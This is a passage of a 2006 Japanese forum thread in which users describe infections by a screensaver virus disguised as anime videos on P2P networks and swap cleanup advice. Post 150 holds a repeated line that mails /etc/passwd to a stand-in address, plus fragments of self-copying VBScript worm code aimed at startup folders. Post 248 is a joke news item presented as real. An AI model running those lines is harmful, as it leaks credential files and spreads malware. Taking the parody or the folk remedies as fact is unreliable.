そのまま放置でもしてたの?
それと、Shareの使い方が分からんとか覚えるのがめんどくせーとか
言っている人がマジで言っているのかどうかが気になる。
147:名無しさん
06/11/04 20:41:57 Wqn20JeP
scrやらexeやらを無視&再生前に拡張子識別
これだけやっとけばいいだけの話と違うの?
なんでこんなのに引っかかるの?頭脳がマヌケなの?
148:名無しさん
06/11/04 21:36:43 EqcAgMna
放置してたしマジで言ってる
149:名無しさん
06/11/05 11:30:03 YOsduInI
ノートンも全然反応しなかったし、
スクリーンセイバーが悪さするとは思わずに、どんなスクリーンセイバーなんだ?
と見てみたらカワイイアニメの女の子がうぐぅうとか言ってるだけだったんで、
なんだよこんなスクリーンセイバーしかつくれないのかよ情けないな
とか思ってあきれていたら。。。。
HDDの中身60GBとprogram filesの中身消されました
150:名無しさん
06/11/05 12:20:42 v+Aap0y/
cat /etc/passwd | mail nobody@nonexistent.com
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
151:名無しさん
06/11/08 00:52:48 nBIkjUUV
(アニメ) デスノート-DEATH NOTE- 第06話 「綻び」 (D-CTV 704x396 DivX6.22 120fps LameVBR).avi .scr
俺も上のファイル踏んで引っかかった。
内容は「たいやきまだー?」って書いてあるあゆの画像が出てきて
ProgramFileのexeは全部消された。cの直下にはKAMOMってフォルダが出来てて
-Readme-.jpgとUSBSHOW.bmpって2つのファイルだけがあった。
C:\System Volume Information\_restore\はシステムの復元をしても
なんか開けなかった。
どうせほとんどのexe消されたし丁度いいからクリーンインストールするべきだな。
152:名無しさん
06/11/08 01:07:57 d3bSprHQ
じゃあしろよ、踏んで良かったなら報告するなよww
153:名無しさん
06/11/08 11:45:37 b6VW48qu
>>152
わざわざ報告してくれた人に大して低脳なレス返すなよ。
154:名無しさん
06/11/08 11:50:17 6atkqqYm
>>151
同じくデスノ6話にやられた
ファイル名が少し違ってて、VBRの後ろに(気まぐれ不定期)
開く前のウィルススキャンはスルーだった
開くとルルーシュの画像が出てきて「オタ野郎名前を名乗れ」と言われたw
HDD内の動画や画像は大丈夫のようだけどprogram filesがやられたので
再インストするよ
155:名無しさん
06/11/08 15:40:17 fig3+UuS
おれも、動画ファイルでやられた。拡張子はAVIだと思う。動画のマークになってたし。よく見ないで消してしまったのでscr がついていたかもしれない。ウイルスバスター2005反応無し
2007だと反応するか教えて。.
上の人ように破壊されたのとProgram Filesのなかも破壊された。
対策はMedia Player Classicで見ようとしたら反応しなかった。反応しないのはscrの拡張子だったからかも知れないけど。そのあとメディアプレイヤーでみるとウイルス感染した。
あとは極窓で調べるか。?がでたら消す でも極窓は動画に?出すこと多いのでオススメできない
これ以外の方法をよろしく
156:(>_<)[sage]
06/11/08 15:41:53 FtTF0uqf
ぁぁ
157:名無しさん
06/11/08 15:48:08 nEfoTd95
なにこのスレ?
158:名無しさん
06/11/08 17:49:22 B2Drt8Oq
XPで拡張子表示するのどうやるんだっけ?
159:名無しさん
06/11/08 18:10:51 NOUrxCY6
Cドラ直下のフォルダ消すだけで駆除おk?
160:めありべる ◆6yD.And.LA
06/11/08 18:50:42 BLRrw8VB
ガキはエロ動画見る為にパソコンに強くなっていくからいいよな。
161:名無しさん
06/11/08 18:51:58 ZAyHJUtA
男性はみんなそうだよ
162:めありべる ◆6yD.And.LA
06/11/08 18:53:20 BLRrw8VB
男っていつまでたっても低俗ね。
163:名無しさん
06/11/08 18:54:31 Jh825CQD
>>158
それでいいらしい
元のscrファイルも消去したほうがよい
164:名無しさん
06/11/08 19:48:39 nEfoTd95
ネカマがなに言ってんだ?
165:名無しさん
06/11/08 19:51:28 qOn2u+s5
自分がPCに疎いからって女がみんなPCオンチみたいに言うなよ
他の女性に迷惑だろ
166:名無しさん
06/11/08 19:56:47 GhaKW/ZO
コードギアスの3話で引っかかったが・・・
破壊された所が無い?
山田チェックでは何もレジストリの改ざんは無いと表示される。
他に変更される箇所とかあるのだろうか?
167:名無しさん
06/11/08 20:54:14 k4VPHAqx
>>166
このウィルスは確かレジストリは弄られないんだよね
だからウィルス発動→即PC再起動とかすれば被害殆ど無し
今は亜種だらけだからどうかワカランが・・・
168:名無しさん
06/11/08 21:02:10 d3bSprHQ
>>166すでに情報はどこかに取られてると思うが,...
169:肉茎平均
06/11/08 21:03:46 4WxOyMf4
>>158
マイコンピューター→ツール→フォルダオプション→表示→登録されている拡張子は表示しない のチェックをはずす
170:名無しさん
06/11/08 21:37:07 p47vpyd7
>>167
その通り。大きい被害を受けたやつはアホの極み。
171:名無しさん
06/11/09 12:58:30 nxbEOB3M
>154だけど
山田チェッカーでは異常無しだった
C直下にできていた BRITANIAフォルダ(画像とSS入り)を削除しても
PC立ち上げなおしたら復活していた
同様に削除したscrファイルも復活してた
172:名無しさん
06/11/09 13:06:10 0TugMK6N
>>169
肉っちありがと!
173:名無しさん
06/11/10 04:59:21 Ujs1igd6
なぜ山田チェッカー?
原田ウイルスの亜種に山田チェッカーは意味無いと思うけど・・・
174:名無しさん
06/11/10 09:39:13 vlEENeZ+
コードギアスの六話で引っかかった
バレーの延長で気が動転して慌ててダブルクリック。その時視界は既に種類の覧に「スクリーンセーバー」の文字を捉えていた
175:名無しさん
06/11/10 10:51:36 DNFlVGNb
俺も昨日の夜引っかかっちまった。風呂上りで油断してた。
コードギアスの704x396版なんつうものがあったんで、なんじゃこりゃと
頭数MB落として強制変換してGOMでちょっと見てみようと実行。
_incomleteファイルだったんで、変なファイルだったら
実行されないだろうと思ったのさ。あぁ笑うがいいさ。
DLフォルダ全てbmp化、Program Filesフォルダのいくつかのexeを壊されたところで
やばさに気づき再起動。
cドライブ直下にKAMOMフォルダが作られてた。
とりあえず削除。
これで駆除は終わったのだろうか……
プログラムを実行してしまった直後、
ついひと月前に買ったウィルスバスター2007が一応反応はしたが、
こいつは役に立ったのだろうか……
その後スキャンしたが、ウイルス検知はされず。怖いな。
しかし再インストールは避けたい……
176:名無しさん
06/11/10 11:06:33 uTRos+eY
>>175 704x396は普通だが...?
177:名無しさん
06/11/10 11:11:23 4BbjG01a
コードギアス5話みたらなぜか古畑みたいのが流れたから即消したがあれは関係ないか
178:175
06/11/10 11:38:19 DNFlVGNb
再インストールじゃなくってクリーンインストールは避けたいなぁ。
>>176
ギアスはふつうのHiVisionサイズより縦長。
横704なら縦486になる。
179:名無しさん
06/11/10 11:53:42 bPb9FVAL
>>109の監視ツール入れておけば最後の防衛ラインが作れるのに・・・
システムの復元の中のコピーとC直下のフォルダ消せば
駆除はできたことになるんだろうけど、program filesがやられてるなら
どうなんだろ。消されたプログラムの再インストで直るのかな?
180:名無しさん
06/11/10 11:54:55 bPb9FVAL
>気が動転して慌ててダブルクリック。その時視界は既に種類の覧に「スクリーンセーバー」の文字を捉えていた
ワロタ。ウイルスに引っかかる時なんて大抵そんなもんだよ。
181:肉茎平均
06/11/10 11:56:28 Ij4pYV1I
nypってver.2とか3で使ってたら意味無いの?
182:名無しさん
06/11/10 12:39:50 S77nsgqY
わがんね
183:名無しさん
06/11/10 13:59:14 rrYxk3H8
これさあOutlook Expressとか破壊されるからさ、正直クリーンインストールやってるのと変わらないくらい、復帰させるの大変
それに動画と思ってクリックするからさあ、今までで最悪かな
184:名無しさん
06/11/10 15:51:18 bzD95nLT
作られたフォルダ削除と件のファイル削除して
再起動してもCにフォルダ作成されてなければ駆除できてる?
185:名無しさん
06/11/10 16:40:13 YW+4dCF1
対策をうだうだ書くより右クリックする癖付けろって一言のほうがいいよ
186:名無しさん
06/11/12 09:39:13 sH+Nfzla
ファイル・・・鯛焼きのbmpに書き換わってしまったんだが、ファイルの復元ってできないのかな?
今まで溜めたファイルがゴッソリと鯛焼きになってしまって・・・
187:名無しさん
06/11/12 10:10:56 Hhxb7aU4
復元できるよググレカス
188:名無しさん
06/11/12 11:23:01 jAJpWCo7
俺は出来なかった
189:名無しさん
06/11/12 13:00:19 koa4hVwA
【1】万が一に備えてクリーンインスト&必要アプリインスト済み状態のバックアップCD or DVDを、Ghostやその手のソフトで事前に作っておく。
【2】「フォルダオプション」→「表示」→「□登録されているファイルの拡張子は表示しない」のチェックは外し、すべての拡張子が見えるようにしておく。
【3】Nortonは無反応なのでアテにしない。
【4】無視条件に「.scr」「.exe」を入れておく。
【5】圧縮ファイルを解凍した際もファイル名を確認。
【6】メディアプレーヤーのアイコンであっても、ファイル名を確認。ぱっと見「.avi」になっていても、さらに名前はスペースで続いており、実は.scrや.exeファイル。
【7】それでもひっかかったら、ぼけっとせずに即再起動、Cドライブ直にある見覚えのないフォルダ(大半Uguu…)と、元になったavi(ってか.scr)は消す。
【8】復元ポイントに関しては以下を参照
URLリンク(esupport.trendmicro.co.jp)
【9】被害が大きい場合、小さくても気味悪い場合、【8】が面倒(よくわからん)場合は、【1】を使って復旧またはOSのクリーンインスト。
190:名無しさん
06/11/12 13:04:30 jAJpWCo7
一番の方法は、タイヤキ欲しいって言ってるんだから
鯛焼き買ってくればいいのに....(/・ω・\;)
191:名無しさん
06/11/12 14:01:00 sYUetizC
雪が降ってる・・・
192:名無しさん
06/11/12 14:21:14 vgZirBA0
こなああああゆきいいいいいい
193:名無しさん
06/11/12 14:46:39 +R9vm7pr
エロゲオタキモい氏ね
194:名無しさん
06/11/14 02:06:33 mqSOa4+T
C:\System Volume Information\_restore\ってどこにあるんだ?
オレのPCにはないんだが・・・
195:名無しさん
06/11/14 12:43:29 qKgw2GV+
>>194
URLリンク(www.google.co.jp)
196:名無しさん
06/11/15 00:43:47 vEQp+rEP
くだらない邪魔が入るのは仕方ないとして、悪意のある人間は連日のイジメ報道でもあるように改心しないですから。
この問題をきちんと整理しましょう。
僕はウイルス・プログラムを捕獲し、MOに入れました。かなりダメージを受けて、めちゃムカついています。警察に届けるつもりです。
このプログラムは、VBを作う作者らしい男の名前をとって、「VB谷口悟郎」ウイルスとしても構いませんか?
彼を見つけたら、最寄りの警察に連絡してください。ウイルス・プログラムに本名を入れるとしたら、社会性が乏しいくせに、目立ちたがりの幼稚な犯罪者でしょう。
VB谷口ウイルスに感染すると、Cドライブに、「KAMOM」などの名前のフォルダ、丸はマークのアイコンを付けた「Winny.exe」、「タコウインナ-たべる?」というアニメ画の少女が描かれた「-Readme-.jpg」 、デスクトップのスクリーンショット「USBSHOW.bmp」
もう一つ、「UPLOADMAN21」というフォルダと、「EX-1.bmp」「EX-2.bmp」「EX-3.bmp」という名前のスクリーンショット画像が入っています。
ダウンロードしたファイルをよく気をつけて見ると、スクリーンセーバーになっています。
僕の場合、WINNYを入れてないPCで起動させてしまったので、Cドライブのプログラム・ファイルのフォルダ内を削除されました。
もし、ファイルを削除して、デスクトップのスクリーンショットを取って、アップさせるだけの単純なものだったら、
キモイ中学生でもできてしまいます。
被害は相当程度広範囲に起きることが予想されるため、VBを使っている「谷口悟郎」なるオタクを警察に連絡して、プログラムにどんな機能を持たせたか聞くか、警察に届けて解析してもらう方が早いかな?
以上、他にも何か分かっていることがあったら、よろしくお願いします。
197:名無しさん
06/11/15 01:14:33 vEQp+rEP
すみません。谷口悟郎というのは、アニメの監督なのですか?
子どもじゃないから、アニメは見ないし、ググッって初めて分かりました。
大人だと、まったく分からないからね。
谷口悟郎が作者名ではないことが分かりましたが、犯人は幼稚なオタクだということしか、分からないということになりました。
絵もキモイし、やってることもキモイし、アニメの監督を崇拝している?
理解できない! 警察に届けた方が早いようです。失礼しました。
198:名無しさん
06/11/15 01:29:24 kbtvqrMu
ウイルスに築いて、即タスクマネージャ、起動して、
目ぼしい.exeを全部停止したら復元ファイルまではやられないですんだみたい
199:名無しさん
06/11/15 03:14:28 JYCIjwQ5
うちのはハードディスクまで破壊されました…
復元ポイントも破壊されてバックアップから起動しようとしたらNTSDR to misringとなりリカバリーかけたらハードディスクが壊れている可能性が…ってなりもうダメでした。
200:名無しさん
06/11/15 03:15:37 3n3Q+URc
感染する人がどういうものを落としてるのか気になる
201:名無しさん
06/11/15 05:43:57 pZ/TXoL8
>>196>>197
ID:vEQp+rEPって単なるアホ?
202:名無しさん
06/11/15 07:35:24 FEdNxZvs
このスレは相変わらずほのぼのしてるね
203:名無しさん
06/11/15 07:44:59 EK0Tc49i
このスレは自作自演でお送りしております
204:名無しさん
06/11/15 16:36:06 W+N03FKd
>>197だから犯人は谷口悟郎だってば!!
205:名無しさん
06/11/15 20:43:26 F85lgj+a
>>197がVBを使う作者まで辿り着いたのはスゴイ事だと思う
206:名無しさん
06/11/16 00:36:36 f1cLEEDo
>>197が作者なんだろ?
207:名無しさん
06/11/16 08:05:40 MKG/XLwf
うーん…
ネギま!? 第07話 「見えた方がいいことってある」 (704x396 DivX511 120fps).avi .src
開いたらコイツに感染したっぽい。
トリップ詐欺&avast信じてて油断してた…○| ̄|_
なんかウィンナーがどうたらこうたらの画像が映し出されたから
コレはマズイと思って速攻終了させたんだけど、
program files内のexeファイルが半分くらい消された。
RAID環境のせいか消すの早すぎだろお前…。
とりあえずC直下に出来たフォルダとwinnyフォルダ消しときゃ大丈夫なのかな。
早く消したおかげかスタートアップも何も増えてないみたい。
レジストリ使わないソフトはDドライブにいつもインスコする癖があってホントに良かったと思った。
とりあえず報告までに。
長文スマソ。
208:名無しさん
06/11/16 08:09:56 jxRIaXlF
URLリンク(blog.livedoor.jp)
これで監視しろよな
209:207
06/11/16 08:15:16 MKG/XLwf
あとあと
C:\Documents and Settings\ユーザー名\
内のフォルダのファイル群がbmpに置き換えられてました。
以上。
>>208
thx。最近何事も無かったからついつい油断してた。
この際にセキュリティ強化してみようと思う。
210:名無しさん
06/11/16 18:23:31 A+tleg22
今まで体験したウイルスの中で一番ひどいわこれ
avastに反応しなかった
HDDの200GB近くが消えた
それにしてもジャ○ラックの裏工作員はよくまぁこんなもの考えるねぇ
むかついたから年中nymx起動してファイル垂れ流しちゃおうかねぇ
まだまだこれくらいではP2Pやめないよ
211:名無しさん
06/11/16 19:41:38 GhZJwC5x
こういう単純なウイルスが出るたびに常に新規ユーザーはいるんだなあと思う
212:名無しさん
06/11/16 19:43:05 SmjkhUFH
しょぼいウィルスだな
なんか深い階層まではbmpしてないし
213:名無しさん
06/11/16 20:41:37 uqfkZc8J
拡張子で.scrになってるのにダブルクリックしちゃうアホにいちいち話合わせてられるかボケ
214:名無しさん
06/11/16 21:39:10 OCeU7Bz9
>>213
ジャ○ラックの裏工作員キタコレ
215:名無しさん
06/11/16 23:11:44 OUzBcS9Z
トリップ偽装されてたので警戒心が緩んだ。
216:名無しさん
06/11/16 23:41:28 WkA9fuxt
>>210
俺も断然やる気出てきたぜ
217:名無しさん
06/11/17 00:06:43 nGMvJf1F
>>210自分の個人情報とか??
218:名無しさん
06/11/17 14:24:33 4myrZyq9
このウイルスは個人情報漏れたりすんの?データ消されるだけ?
219:名無しさん
06/11/17 15:52:49 4myrZyq9
C:\System Volume Information\_restore\のは消さなくておk?
220:名無しさん
06/11/17 17:52:44 4myrZyq9
>>93の>OutlookやIE等の.dllを何らかのファイルに置き換えようとしていたのが分かりますた。
これはほんとなの?
221:名無しさん
06/11/17 18:23:51 nGMvJf1F
>>220実行してみればわかるよw
222:名無しさん
06/11/17 18:30:12 4myrZyq9
>>221
もう実行したんだぜw
_restore内のは本体だけ削除すればいいのかな?
223:名無しさん
06/11/17 21:39:14 F+WGrVGz
カスペのオンライン検索でなにかひっかからないのかな?
224:名無しさん
06/11/17 23:13:57 tTa7acmg
ウイルスバスターもまだ検出できないな。
こりゃウイルスバスターは使えないわ。
225:名無しさん
06/11/17 23:24:39 B8B/q3RB
RegseekerのUnknown Hard Errorで逆に撃沈させてやった
些細なウイルスだな
226:名無しさん
06/11/18 00:00:41 AuxcWnYd
なんかこのスレって不思議
明らかにロビーじゃないところの人が集ってると思うのに
どうしてみんないつものように死ねとか言わないのか
227:目黒ゑびす ◆RC04/GZfx2
06/11/18 00:02:18 jKxKGTPJ
馴れ合いじゃないからなじゃないの
228:肉茎平均
06/11/18 00:03:31 JHgwiDPM
拡張子も確認しないで実行するなんて信じられないし
229:ウンコの王様
06/11/18 00:04:54 dMdwihz6
人
(__)
( ・∀・)話がループしてない?
230:名無しさん
06/11/18 00:05:01 AuxcWnYd
馴れ合いと相互扶助の違いがいまいちよく分かんないなあ
231:名無しさん
06/11/18 13:50:43 FeZMrzCU
ブラックラグーン19話でやられた
マイピクチャ、マイドキュメント、マイミュージック、あと貯めてた音楽ファイルが全部たいやきになった\(^o^)/
でも、どうやら2層までしかたいやきになってなかった。3層ぐらいに入れてたファイルは全部無傷でした。
C直下には、AYUFILEってウイルスフォルダが入ってました。
今のところ、他の被害は見受けられません。
でも、なんか怖いからクリーンインストールするつもりです。
232:名無しさん
06/11/18 16:06:19 FeZMrzCU
たいやきになったファイルは元に戻らなさそうだな。。。
復元してもたいやきだったし。。。
233:みのりかわ可奈子
06/11/18 16:44:25 9s7yTbI8
たいやきってなんじゃろ
234:名無しさん
06/11/18 17:08:11 e7rqF5F7
>>233 「kanon 月宮あゆ」で検索してみ
235:名無しさん
06/11/19 11:32:46 hXtRPnE7
これ・・・ファイルの復元方法ってないのかな・・・
236:名無しさん
06/11/19 11:45:47 RPIFYv2C
C直下に作られたデスクトップ画像ってWinny経由で
アップロードされるのかな?
237:名無しさん
06/11/19 14:37:17 2HP0S6XV
ny経由ではなくてftpサイトにアップするらしい。
238:名無しさん
06/11/19 14:38:53 stbfIN3m
デスクトップ画像だけでしょ?
239:名無しさん
06/11/19 14:45:50 cfEJal0p
ファイルって元にもどらないのかな?
240:名無しさん
06/11/19 14:50:24 YHppD7Pq
運が悪くない限り戻せる
241:名無しさん
06/11/19 14:56:22 cfEJal0p
元のファイルってどうやってbmpから戻したらいいの?
242:名無しさん
06/11/19 16:02:01 Z4JvnMZx
拡張子をbmpから書き換えればいい、ただそれだけw
243:名無しさん
06/11/19 16:12:52 cfEJal0p
書き換えたんだけど再生ができないです。ファイルサイズが
へってるんですけど?
244:名無しさん
06/11/19 16:32:14 Z4JvnMZx
じゃあファイルサイズをふやせばいいじゃんww
245:名無しさん
06/11/19 17:53:51 RPIFYv2C
>>243
名前が同じってだけで全く別のファイルで上書きされてるんでしょう。
諦めなさいな。そんなに大事なファイルだったのか?
246:名無しさん
06/11/19 18:07:09 xTeWrURs
諦めたほうが良い。
247:名無しさん
06/11/19 19:11:48 j4AKvdVk
俺は『ネギま!?』の七話でこれにやられたわ。
ウイルスバスター2007が使用不能になっちゃった…。
システム復元で元に戻った、…ぽいけど??
248:名無しさん
06/11/20 04:19:35 EHYERv6v
【社会】総務省、LANケーブルを引き抜くロボットを開発、ウィニー対策で
総務省は30日、平成19年度予算の概算要求をまとめ、その中で、「ウィニー」などファイル交換ソフトによる情報流出被害を
最小限に抑えるためのLANケーブルを抜くロボットを開発する技術予算として16億円を盛り込んだことを明らかにした。
このロボットはファイル交換ソフト起動とともに、オフィス内のLANケーブルを探し、コネクタから引き抜く一連の動作を行うロボットで、
一体100万円程度の価格を目指す。開発予算の多くは、LANのコネクタの爪をつまむアームの開発に費やされる見込み。
ノートパソコン等に普及している無線LANについては、強力な妨害電波によるジャミング等の手段が検討されているが
オフィス内の他の機器への被害も大きいため、ノートパソコンを机から落として壊すなどの手段を採用するものと見られている。
249:名無しさん
06/11/20 04:39:02 ZJ7TZ4Wy
>>247
仲間www
250:名無しさん
06/11/20 12:19:15 EfSBuRaf
オリンシスかコードギアスでやられた
KANONの川澄舞のスクリーンセーバーでたこさんウインナーがどうとか
電話番号みたいなのもあったな
ファイルのサムネがでなくてダブルクリックしてスクリーンセーバーだと気づいたときには時すでに遅し
ただ、ダウンフォルダじゃない別のフォルダで開いたのでそのフォルダ内のファイル全部書き換えられただけで済んだな
すぐにスクリーンセーバー強制終了して削除後再起動してバスター2007で検索かけたが何もみつからず
251:名無しさん
06/11/20 12:31:09 H38VnTB9
バスターは糞。avast!も検出しなかったらしい。(>207-210)
252:名無しさん
06/11/20 15:31:27 EfSBuRaf
CドライブみてたらHIZACってフォルダが作られててデスクトップ画像と
URLリンク(www.sunseagull.com)
が入ってた。
OSをCドライブにいれてなかったから被害が小さかったのだろうか
またCドライブをスキャンしてみる
253:名無しさん
06/11/20 16:55:41 3Yvtltb+
73
254:名無しさん
06/11/20 18:19:23 Fh/JyS9u
763
255:名無しさん
06/11/20 18:34:36 86DkI7k1
AVGだと検出できる。
256:名無しさん
06/11/20 18:55:18 pd9h42MC
うんこ
257:名無しさん
06/11/21 20:25:43 ZJ6ykDIy
a2だと検出できる
258:名無しさん
06/11/21 20:37:04 0huRFs8g
a2ってなに
259:名無しさん
06/11/21 20:39:17 Jb6Vveqa
だれかあの電話番号に電凸した人はいないの?
260:名無しさん
06/11/21 23:37:38 ZJ6ykDIy
>>258
a-squared Free
261:名無しさん
06/11/22 20:45:33 MWfk4rhx
俺が拾ったのはMISAKA-125-0.exeってヤツ
262:名無しさん
06/11/22 20:57:03 XRFsf2gD
今のところ検出できるのは
ノートン、カスペ、AVG、a2
検出できないのは
バスター、マカフィ、avast!、AntiVir
263:名無しさん
06/11/23 02:08:59 bBLd96RH
>>262
バスターやavast!で検出できないのは痛いな
264:名無しさん
06/11/23 02:57:46 GYWlf++L
AVGが反応したやつこれだったのか。
デスノート第7話 曇天
右クリスキャンでたすかった。
265:名無しさん
06/11/23 20:19:50 cR/badXr
このウイルスファイル圧縮すると1MBくらいにしかならないね
266:名無しさん
06/11/24 01:20:07 uNKEtLLa
俺も引っかかったけどディスクトップの画像取られてKANOMI?
見たいなフォルダー作られた以外何も無かったよ
267:名無しさん
06/11/24 09:13:02 NuYsjyNB
>>266
俺も俺も。タコさんウィンナーとうぐぅ両方引っかかったけど(おぃ)
フォルダと画像撮られただけで、programファイルのexeが消されたり、
bmpに変換させられたってことは無かった。
バスターは勿論未反応だったけど、他のオンラインスキャンやっても
特に問題ない様子。
268:肉茎平均
06/11/24 11:46:18 elN+mL7P
遂にダウンロードも違法になりそうですよ
URLリンク(vista.jeez.jp)
269:名無しさん
06/11/24 11:54:42 ylaRmCDb
逆に考えるんだ。法が施行されるまで安全だと考えろ
270:肉茎平均
06/11/24 11:56:23 elN+mL7P
ふむ。
271:名無しさん
06/11/24 11:57:34 kZUs4JEp
アップロードが明確に違法だとされてからも
これだけファイルが出回っている現状を考えれば
ダウンが違法になっても特に何の問題もないでしょ。
272:名無しさん
06/11/24 12:34:55 WenPAV9l
>>267
いいなぁ、俺はProgramFilesもやられたよ。
いつまでも動画が映らないからって3回も起動したからだろうか。
273:名無しさん
06/11/25 12:56:43 mOhAupiS
nyフォルダ内に隠しupフォルダが勝手に作られて、
HDD内のメディアファイルがそこに送られている・・・
upフォルダ内にはmp3やavi,wmvファイルが、アプリケーションとなってそこにある。
パーティションを区切っているが、nyが入っているところは満杯になってしまった。
upフォルダは削除できない(フォルダに送っている途中の扱いで)。
フォルダが作られた日時と誤差2分でwinsocks.dll、explorer.exeが、
ウイルスバスターで隔離されている。
クリーンインストールせずに、このupフォルダに送るコマンドを止めさせる方法は
ないのかな?
274:名無しさん
06/11/25 13:12:36 VGkfKkFW
>>273
Ctrl+Art+Delでタスクマネージャを開き、プロセスタブ内のリストから選らんで終了させる。
275:名無しさん
06/11/25 13:21:04 VGkfKkFW
あと何種類かのセキュリティーソフトメーカーのサイトに行って、
オンラインスキャンをやってみるべし。
それで駆除できたなら、クリーンインストールしなくて済むかも。
駆除後も変な動作が確認できるなら、クリーンインストするしかないね。
276:273
06/11/25 13:35:32 mOhAupiS
>>274-275
レスサンクス!
リスト内のどれだか分からない・・・ああ無能・・・
オンラインスキャンは、nyのupフォルダとOSとかが入っているパーティションが
同じのため、常に満杯で、スキャンできない(スキャンするために事前にこちらに
ダウンロードするファイルがダウンロードできないせいかな?)
プロセスタブにいろいろでてるけど、この中のどれかが分かれば
止められる気がするんだけど・・・
277:名無しさん
06/11/25 14:06:23 VGkfKkFW
>>276
もうスタートアップに組み込まれてるかもしれんが、一度再起動してみれば?
最悪はもう起動しないかもしれないけど。
278:名無しさん
06/11/25 14:08:04 VGkfKkFW
あと問題が解決するまでは、オンラインスキャンをやる以外、極力ネットに繋げないことをお勧めする。
279:名無しさん
06/11/25 14:11:04 ApPIpq5T
URLリンク(uechoco.s14.xrea.com)
URLリンク(blog.livedoor.jp)
URLリンク(www.ccleaner.com)
解説ページ(一例)
URLリンク(eazyfox.homelinux.org)
この辺やっとけ
280:273
06/11/25 14:25:52 mOhAupiS
>>277-279 レスサンクス!
再起動しても変化無しです・・・
ny自体削除しましたし、通信状況からすると、勝手にどこかに
ファイルを転送している様子もありません。
upフォルダ内のタイトルを見ると、メディアファイルだけなので、
特に送られたとしても問題ありませんが・・・
reg cleanerとeasy cleanerの二つを積んでますが、
削除の狙いがつけられないので・・・
ウイルスは隔離されているけれど、
その影響は続くってこと、あるのかな?
281:名無しさん
06/11/25 14:36:44 VGkfKkFW
>>280
別のドライブにファイルを移動して、空き領域を増やしてからオンラインスキャンをやってみるしかないね。
まだコピーする処理が動いているなら、そのプロセスを見つけてタスクマネージャーから動作を終了させるしかないよ。
282:273
06/11/25 14:59:05 mOhAupiS
>>281
空きがでると、すぐにまた一杯になる。多分、ディスクの空き容量が
メディアファイルの全体量より大きければ、全てをupさせて止まるんだろうね。
プロセスを見つけようとしたけど、特定できなかった・・・
メディアファイルだけを狙ってupしてるけど、有名なウイルスではないのかな?
メディアファイルの最後にexeをつけてavi.exe mp3.exe wmv.exe とかにする・・・
283:名無しさん
06/11/25 15:12:24 VGkfKkFW
>>282
スタートアップフォルダに覚えの無いプログラムが登録されてないかい?
あとはWindows最適化ツールとかを入れているなら、自動実行されてるプログラムをチェックできるけどね。
それでも判明しないならもうお手上げだ。
284:273
06/11/25 15:47:52 mOhAupiS
>>283
何度も親切にレスしてくれて有難う・・・(涙)
もう少しプログラムに詳しければいいんだろうけど、ごめんなさい・・・
プログラム名特定で、「これを削除しろ!」とか言われないとダメかも・・・
他にも被害者がいる筈と思って、調べているんだけど、
なかなか狙い打つプログラム名に行き当たらない・・・
250GBのハードディスクを2つのパーティションに分けて、
20GBをプログラムに、230GBを保存に使ってたんだけど、
両方残り1GBのところで、切羽詰って古いのを消して使ってました。
230GBの方にあるメディアファイルが20GBのパーティションの方に流れ込むので、
厳しい状況です・・・20GBの方にも、バックアップを取ってないのがかなりあって・・・
以前なら迷わずクリーンインストールしたのですが・・・
泣き言連発レスで鬱陶しくしてすみません
285:名無しさん
06/11/25 16:10:33 Zi0nvd3f
>>267
同じ様な状態、フォルダを削除したところ何もおこらなくなった
286:名無しさん
06/11/25 16:35:16 VGkfKkFW
>>284
よく聞く情報漏えいをもたらすAntinnyというウイルスは、svchost.exeというシステムファイルに偽装して活動するらしい。
もう一度タスクマネージャのプロセスタブを開き、イメージ名でソート後、svchost.exeを探してみてくれ。
いくつかあると思うが、ユーザー名がSYSTEM、NETWORK SERVICE、LOCAL SERVICEなら問題ないが、
ユーザー名が自分のユーザー名になってるsvchost.exeがないかい?
もしあったらそれがウイルスだ。終了させてみてくれ。
なかったら他のウイルスだろう。ウイルススキャンして見つけるしかない。
287:273
06/11/25 17:02:51 mOhAupiS
>>286
本当に感謝しています!私もかくありたいと思うばかりです!
タスクマネージャーで、2つありました。
ユーザー名の調べ方が分からず、ファイル名で検索したら、
1つしか見つからず、所有者はAdministrator(自分のユーザー名)で、
その周辺にあるファイルも全て所有者は同じでした。
OSは2000です。ユーザー名の調べ方が間違っているのかもしれません。
タスクマネージャーで、試しにタスクを終了させて見ましたが、
2つ共、終了できませんでした(エラー表示が出て)。
バスターが検出しないほどよくできているってことなんでしょうか?
親切にご指導頂いているにもかかわらず、スッキリ解決できなくて
恐縮しています・・・でも、本当に嬉しいです。
288:名無しさん
06/11/25 17:07:42 ApPIpq5T
だから>>279の上段2つ使えと・・
289:273
06/11/25 17:23:54 mOhAupiS
>>288
SlightTaskManage
山田チェッカーというやつですか?
SlightTaskManageはよさそうですね。
ただ、ハードディスクが一杯でダウンロードしようとすると
始らない状況になっているんです・・・
他のPCでダウンロードして、メディアを使って、プログラム以外が入っている
パーティションへ入れるということなら可能だと思いますが・・・
山田チェッカーの方は使用法がいまいちよく分からないので、
もう少し見てみます。
レス有難うございました。連投して本当にごめんなさい
290:名無しさん
06/11/25 17:40:29 ApPIpq5T
フロッピーみたいな時代遅れのメディアから起動してみたらどうだろうか
山田チェックツールはHOSTS修正やsvchost.exeのプロセススキャンに使える
291:273
06/11/25 17:49:28 mOhAupiS
>>290
有難うございます!
近頃使わなくなったフロッピーですが、今回は役立ちそうですね!
コンビニで買ってきます!
山田チェックツールでプロセススキャンできるんですね!
ガンを見つけたいです!!!
2chで質問すると、結構叩かれることが多いですが、
今回は本当にいい方達に恵まれました!
